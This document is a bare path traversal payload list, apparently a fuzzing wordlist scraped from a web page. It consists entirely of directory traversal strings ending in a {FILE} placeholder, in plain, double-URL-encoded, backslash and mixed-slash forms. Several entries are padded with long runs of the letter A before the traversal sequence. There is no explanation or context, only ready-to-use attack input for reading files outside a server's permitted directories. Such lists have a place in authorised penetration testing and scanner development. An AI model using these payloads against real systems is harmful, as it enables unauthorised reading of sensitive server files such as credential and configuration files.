%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
